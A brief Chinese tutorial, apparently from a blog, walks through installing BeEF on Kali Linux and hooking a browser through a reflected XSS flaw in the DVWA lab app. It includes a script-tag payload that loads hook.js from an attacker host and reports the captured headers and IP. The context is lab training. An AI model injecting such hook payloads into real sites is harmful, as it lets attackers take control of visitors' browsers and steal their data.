目录
[5、点击 Hook me:将配置的页面导入BEEF中](#5、点击 Hook me:将配置的页面导入BEEF中)
一、更新安装包
┌──(root㉿kali)-[/home/kali]
└─# apt-get update

二、安装beef-xss
┌──(root㉿kali)-[/home/kali]
└─# apt-get install beef-xss

三、启动Beef-Xss工具
第一次启动会提示你需要输入密码

1、查看hook.js
可见代码之复杂,功能之多

2、查看后台登录地址

3、查看用户名和登录密码
┌──(root㉿kali)-[/home/kali]
└─# cd /usr/share/beef-xss
┌──(root㉿kali)-[/usr/share/beef-xss]
└─# ls -al

┌──(root㉿kali)-[/usr/share/beef-xss]
└─# vim /etc/beef-xss/config.yaml

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

在DVWA的反射型XSS中注入BEEF配置页面hook.js
<script src="//192.168.17.130:3000/hook.js">
提交后:

此时BEEF中监控已经上线:

可获取http请求头,服务器类型,IP地址等信息

攻击连接意图:
